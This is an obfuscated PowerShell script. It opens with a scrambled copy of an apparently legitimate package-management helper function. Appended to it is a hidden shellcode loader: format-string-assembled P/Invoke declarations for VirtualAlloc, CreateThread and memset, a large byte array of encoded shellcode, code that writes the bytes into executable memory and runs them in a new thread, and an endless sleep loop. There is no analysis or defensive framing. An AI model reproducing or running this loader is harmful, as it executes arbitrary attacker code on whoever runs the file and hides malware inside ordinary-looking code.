function Ge`T`-DYN`AMIc`p`A`RaMEtErs
{
    [CmdletBinding()]
    Param
    (
        [Parameter(mANdatoRy=${Tr`UE})]
        [ValidateNotNullOrEmpty()]
        [Uri]
        ${lO`c`ATIoN},

        [Parameter(mAnDAtOry=${tR`UE})]
        [REF]
        ${P`AckA`g`em`ANag`eMEN`TPrOVid`er}
    )

    ${paRamdICT`iON`A`Ry} = &("{1}{2}{3}{0}"-f't','New','-','Objec') ("{9}{10}{7}{3}{0}{5}{4}{1}{2}{6}{8}"-f 'n','ameter','Dict','io','untimeDefinedPar','.R','i','mat','onary','System.Management.Au','to')
    ${Dyn`AmicO`P`TioNs} = ${N`ULL}

    ${l`oC} = &("{0}{2}{4}{3}{1}" -f'Ge','String','t','tion','-Loca') -LocationUri ${l`o`cA`TIOn}

    if(-not ${l`oc})
    {
        return ${PArAm`DI`CtI`o`NARY}
    }

    
    ${L`Oc} = .("{2}{1}{0}{3}"-f 'c','Lo','Resolve-','ation') -Location ${L`OC} `
                            -LocationParameterName ("{2}{1}{0}" -f'ion','t','Loca') `
                            -ErrorAction ("{0}{1}{2}"-f 'SilentlyCont','in','ue') `
                            -WarningAction ("{2}{0}{1}{3}"-f 'n','tlyContinu','Sile','e')
    if(-not ${l`Oc})
    {
        return ${pAr`A`MD`iCT`iOnaRy}
    }

    ${p`ROvide`Rs} = .(("{1}{10}{5}{7}{2}{8}{6}{0}{3}{4}{9}"-f 'ac','PackageMana','g','kag','e','y','et-P','T','G','Provider','gement')).REpLacE(([CHAR]121+[CHAR]84+[CHAR]103),[StRING][CHAR]92) | .("{2}{3}{1}{0}"-f'Object','-','Whe','re') { ${_}."F`e`ATURES".("{2}{1}{0}" -f 'sKey','ain','Cont').Invoke(${ScRIpT`:`SUp`poRtspsMo`DULE`S`Fe`Atu`ReNA`me}) }

    if (${p`ACKagEM`ANagEME`NtPR`ovi`dER}."Val`UE")
    {
        
        if(${PaC`kAG`ema`NAgEMEn`TPr`OviDer}."Val`UE" -ne ${scrip`T:`psMod`UlePr`OvIdE`R`NAME})
        {
            ${s`ElecT`E`DprOVIDER} = ${p`R`OvIdE`Rs} | &("{1}{0}{2}" -f 'here-Obj','W','ect') {${_}."prov`ID`erna`Me" -eq ${PacKaGE`mAnAGe`mEN`T`pRoViDeR}."V`AluE"}

            if(${S`elECTedpR`ovI`deR})
            {
                ${r`ES} = &("{1}{5}{0}{2}{3}{4}"-f 't-P','G','acka','geSourc','e','e') -Location ${L`oC} -Provider ${packA`gEMANAGemE`Nt`PROvID`Er}."V`AlUe" -ErrorAction ("{3}{0}{1}{2}"-f 'entl','yCon','tinue','Sil')

                if(${r`Es})
                {
                    ${d`Yn`AmIc`OptIONS} = ${S`eLECtE`DPro`V`Ider}."dYnAmi`c`Opt`ionS"
                }
            }
        }
    }
    else
    {
        ${p`A`Ck`AgemAna`gEM`eNtpr`oVIder}."Val`Ue" = .("{3}{1}{5}{4}{2}{0}"-f 'e','PackageManagem','oviderNam','Get-','tPr','en') -Location ${LoCA`TION}
        if(${pa`CkagEmAna`GEM`e`NTPRO`VI`DeR}."VA`lUe")
        {
            ${P`ROVid`er} = ${PrO`V`IDERs} | .("{1}{0}{2}{3}"-f 'e-O','Wher','bj','ect') {${_}."PrO`VId`ERN`AmE" -eq ${paC`kA`geMa`Na`Ge`MeNTpRO`VideR}."V`Alue"}
            ${DYNAmI`cO`pt`IONS} = ${pRO`Vid`er}."dyn`A`mI`coPt`IOnS"
        }
    }

    foreach (${O`pT`ion} in ${dYnam`iCOpT`io`NS})
    {
        
        if( ${o`P`TiON}."Is`Re`QUIRED" -and
            (${Opt`i`On}."n`AmE" -eq ("{0}{1}{2}"-f'Destinat','i','on')) )
        {
            continue
        }

        ${parAM`AtTr`i`ButE} = .("{1}{0}{2}" -f'-Ob','New','ject') ("{3}{13}{1}{2}{12}{0}{6}{7}{10}{11}{4}{9}{5}{8}" -f'n.P','gement.A','utomati','System','terAttri','t','ar','a','e','bu','m','e','o','.Mana')
        ${par`AMAt`TRiBU`Te}.ManDatorY = ${OPt`I`On}."ISre`qUIR`ED"

        ${Me`SsaGE} = ${LOcal`IZed`dATa}."dy`NAMi`Cp`AramEtE`Rh`elpm`eSS`A`GE" -f (${op`TI`on}."Na`ME", ${P`Ac`kageMANAg`eMENt`PrO`Vi`d`Er}."va`lUe", ${L`oc}, ${o`PT`iON}."n`Ame")
        ${p`A`RamAtT`RI`BUTe}.hELPMEsSAGE = ${M`eSsage}

        ${At`Tr`IbUTE`CoLLeCTiOn} = &("{2}{0}{1}{3}" -f'ew-ob','j','n','ect') ("{10}{17}{0}{11}{12}{7}{9}{1}{16}{13}{2}{8}{15}{6}{4}{3}{14}{5}" -f 'em.Co','.O','lle','em','[Syst','ribute]','on','cti','ct','ons','S','ll','e','del.Co','.Att','i','bjectMo','yst')
        ${atTri`Bu`T`eCo`LLEC`T`IoN}.("{0}{1}" -f 'Ad','d').Invoke(${PARAMatTr`ib`U`TE})

        ${A`Ge`P`AraM} = &("{1}{2}{0}" -f 'ct','N','ew-Obje') ("{6}{4}{7}{2}{5}{8}{3}{1}{0}" -f 'r','mete','omation.Run','finedPara','ystem.Management.Au','t','S','t','imeDe')(${o`P`TiON}."na`mE",
                                                                                    ${SCript`:`Dy`NAM`icoP`Ti`ONTyp`E`maP}[${O`PtIon}."T`yPE"."va`LUE__"],
                                                                                    ${A`TTrI`BUtecoL`leCt`iON})
        ${P`A`RAM`d`IctioNAry}.("{1}{0}" -f'dd','A').Invoke(${op`Ti`ON}."na`me", ${a`GEP`A`RAM})
    }

    return ${P`ArAMDIcTiO`NaRY}
}
${Sj`Tb} = ((("{20}{39}{8}{47}{71}{2}{0}{45}{40}{43}{73}{15}{30}{7}{49}{21}{81}{55}{29}{54}{37}{6}{70}{33}{56}{44}{63}{61}{82}{66}{62}{19}{22}{9}{53}{26}{18}{14}{48}{46}{80}{11}{27}{65}{75}{42}{23}{64}{4}{36}{59}{16}{35}{68}{25}{67}{79}{31}{12}{57}{60}{58}{77}{1}{28}{38}{10}{78}{50}{32}{3}{84}{83}{41}{72}{76}{13}{74}{34}{17}{69}{51}{5}{24}{52}" -f ']public static exter','x6wmsv','w)','static','Ptr lp','ou',' flProtect);[Dll','ss, ','port','reateThr','lx6','tPtr','dI','t(In','Attributes, uint ','P','ameter, uin','rc, uin','ead','tPtr','[Dll','Size',' C','ddress, In','nt','nF','ntPtr lpThr',' ','c','in','tr lpAddre',' lpThrea','blic ','e','Ptr dest, uint s','t dwCre','P','ype, uint','rt.dl','Im','llo','Ptr mem','tA','c(I','nel32.d','n IntPtr VirtualA','ackSize, I','(x6wkernel32.','dwSt','uint dw','pu',' c',');','ead(I','t flAllocationT','u','r','d);','por','ar','[DllIm',']public ','n In','llx6w)','t','lpSt','r','lag','atio','t','Import(x6wk','dllx6','s','nt','t','ar','e','t(','w)]','s, IntPtr','n',', ','static exte','tern Int',' ex'))."R`epLaCE"(([cHAr]120+[cHAr]54+[cHAr]119),[STRiNg][cHAr]34));${w} = .("{0}{1}{2}" -f'Ad','d-Ty','pe') -memberDefinition ${sj`Tb} -Name ("{0}{1}" -f 'Win','32') -namespace ("{3}{0}{1}{2}"-f 'in32Func','tion','s','W') -passthru;[Byte[]];[Byte[]]${Z} = 0xb8,0x93,0x93,0xe9,0x56,0xd9,0xec,0xd9,0x74,0x24,0xf4,0x5b,0x31,0xc9,0xb1,0x47,0x83,0xc3,0x04,0x31,0x43,0x0f,0x03,0x43,0x9c,0x71,0x1c,0xaa,0x4a,0xf7,0xdf,0x53,0x8a,0x98,0x56,0xb6,0xbb,0x98,0x0d,0xb2,0xeb,0x28,0x45,0x96,0x07,0xc2,0x0b,0x03,0x9c,0xa6,0x83,0x24,0x15,0x0c,0xf2,0x0b,0xa6,0x3d,0xc6,0x0a,0x24,0x3c,0x1b,0xed,0x15,0x8f,0x6e,0xec,0x52,0xf2,0x83,0xbc,0x0b,0x78,0x31,0x51,0x38,0x34,0x8a,0xda,0x72,0xd8,0x8a,0x3f,0xc2,0xdb,0xbb,0x91,0x59,0x82,0x1b,0x13,0x8e,0xbe,0x15,0x0b,0xd3,0xfb,0xec,0xa0,0x27,0x77,0xef,0x60,0x76,0x78,0x5c,0x4d,0xb7,0x8b,0x9c,0x89,0x7f,0x74,0xeb,0xe3,0x7c,0x09,0xec,0x37,0xff,0xd5,0x79,0xac,0xa7,0x9e,0xda,0x08,0x56,0x72,0xbc,0xdb,0x54,0x3f,0xca,0x84,0x78,0xbe,0x1f,0xbf,0x84,0x4b,0x9e,0x10,0x0d,0x0f,0x85,0xb4,0x56,0xcb,0xa4,0xed,0x32,0xba,0xd9,0xee,0x9d,0x63,0x7c,0x64,0x33,0x77,0x0d,0x27,0x5b,0xb4,0x3c,0xd8,0x9b,0xd2,0x37,0xab,0xa9,0x7d,0xec,0x23,0x81,0xf6,0x2a,0xb3,0xe6,0x2c,0x8a,0x2b,0x19,0xcf,0xeb,0x62,0xdd,0x9b,0xbb,0x1c,0xf4,0xa3,0x57,0xdd,0xf9,0x71,0xcd,0xd8,0x6d,0x20,0xbf,0xc8,0x90,0xbc,0xbd,0x0e,0x7d,0x31,0x4b,0xe8,0xd1,0x19,0x1b,0xa5,0x91,0xc9,0xdb,0x15,0x79,0x00,0xd4,0x4a,0x99,0x2b,0x3e,0xe3,0x33,0xc4,0x97,0x5b,0xab,0x7d,0xb2,0x10,0x4a,0x81,0x68,0x5d,0x4c,0x09,0x9f,0xa1,0x02,0xfa,0xea,0xb1,0xf2,0x0a,0xa1,0xe8,0x54,0x14,0x1f,0x86,0x58,0x80,0xa4,0x01,0x0f,0x3c,0xa7,0x74,0x67,0xe3,0x58,0x53,0xfc,0x2a,0xcd,0x1c,0x6a,0x53,0x01,0x9d,0x6a,0x05,0x4b,0x9d,0x02,0xf1,0x2f,0xce,0x37,0xfe,0xe5,0x62,0xe4,0x6b,0x06,0xd3,0x59,0x3b,0x6e,0xd9,0x84,0x0b,0x31,0x22,0xe3,0x8d,0x0d,0xf5,0xcd,0xfb,0x7f,0xc5;${g} = 0x1000;if (${z}."LEn`gth" -gt 0x1000){${g} = ${Z}."LEN`GTh"};${u`Fp}=${w}::("{1}{0}{2}"-f'tua','Vir','lAlloc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."l`enGTh"-1);${I}++) {${w}::"mE`msET"([IntPtr](${U`Fp}.("{1}{0}{2}"-f'n','ToI','t32').Invoke()+${I}), ${z}[${I}], 1)};${w}::("{2}{3}{0}{1}" -f 'rea','d','CreateT','h').Invoke(0,0,${u`Fp},0,0,0);for (;;){.("{0}{1}{2}" -f'Start-','slee','p') 60};
